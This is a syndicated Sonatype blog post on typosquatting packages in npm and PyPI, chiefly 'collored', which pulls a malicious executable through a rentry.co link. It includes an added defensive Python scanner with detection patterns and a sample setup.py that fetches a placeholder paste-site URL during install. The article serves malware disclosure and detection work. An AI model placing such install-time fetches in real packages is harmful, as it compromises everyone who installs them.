
Careful Out there: Open Source Attacks Continue to be on the Uptick

Sonatype is seeing an upsurge in suspicious and malicious packages infiltrating multiple open source repositories, a trend that began last month and has continued into this week.

This week, we have identified 130 typosquatting packages on npm and a dozen malicious packages on the PyPI repository. The discovery was made by Sonatype’s automated malware detection systems, offered as a part of Nexus Firewall.

The timing of these attacks is rather interesting—when the world is focused on the Russia-Ukraine crisis and governments are urging organizations to step up cyber security efforts in response to related malicious cyber incidents.

As the minds and hearts of most professionals are focused on the ongoing developments, opportunistic threat actors may be incentivized to renew their old tactics—from infiltrating open source repos with malicious typosquats to leveraging dependency confusion attacks that just won’t go away.

New malicious PyPI packages

Where to begin? It’s been a busy week for members of our security research team. My researcher colleagues Ankita Lamba and Juan Aguirre have been relentlessly tracking suspicious activity in the form of hundreds of counterfeit packages seen on the npm and PyPI registries, and responsibly reporting these findings to the repo maintainers.

Collored vs. colored

While the official colored package is a “simple library for color and formatting to terminal,” the malicious typosquat “collored” identified by Sonatype this week spins up a malicious EXE on the infected machine.

Instead of packing the executable within the package, however, “collored” makes an HTTP request to a hardcoded rentry[.]co link:

The rentry[.]co URL provides a Discord webhook address to a suspicious executable, srv.exe, which, at the time of our submission, was identified as malicious by multiple antivirus engines on VirusTotal.

“collored” is tracked as sonatype-2022-1141 in our security research data.
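As an added, defender-side example (not code from Sonatype or the original post), the two signals this section describes can be checked mechanically: a package name one edit away from a popular one, and an install script that fetches a hardcoded paste-site URL while the package installs. The popular-package shortlist, the host watchlist and the sample setup.py below are constructed for the example, and the rentry[.]co path is a placeholder.

```python
import re

# Constructed shortlist of popular PyPI names to compare against; a real
# check would load the top few thousand names from the registry.
POPULAR = {"colored", "requests", "urllib3", "numpy", "pandas"}


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment) distance: insertion,
    deletion, substitution and adjacent transposition each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name: str, max_dist: int = 1) -> list:
    """Popular names within max_dist edits of `name` (exact match excluded),
    after PyPI-style normalisation of case and underscores."""
    n = name.lower().replace("_", "-")
    return sorted(p for p in POPULAR if p != n and edit_distance(n, p) <= max_dist)


# Assumed watchlist of hosts from the collored case (paste site, Discord CDN).
HOSTED_URL = re.compile(r"https?://(?:rentry\.co|cdn\.discordapp\.com)/[^\s\"')]+", re.I)
# Calls that mean code runs at install time rather than at import time.
INSTALL_EXEC = re.compile(r"\b(?:urlopen|requests\.get|subprocess|os\.system)\b")


def scan_install_script(source: str) -> dict:
    """Flag a setup.py that fetches a hardcoded URL while the package installs."""
    return {
        "hosted_urls": HOSTED_URL.findall(source),
        "runs_code_at_install": bool(INSTALL_EXEC.search(source)),
    }


# Constructed sample setup.py in the style the post describes (placeholder path).
SAMPLE_SETUP = '''
from setuptools import setup
from urllib.request import urlopen
stage2 = urlopen("https://rentry.co/EXAMPLE-PLACEHOLDER").read().decode()
setup(name="collored", version="0.1.0")
'''
```

Run against a fresh package's name and its setup.py, a non-empty candidate list together with a hosted URL and install-time execution is the combination worth blocking at the firewall rather than letting through to a build.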

What’s in a name?

Further, we deep dive into a rather (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/careful-out-there-open-source-attacks-continue-to-be-on-the-uptick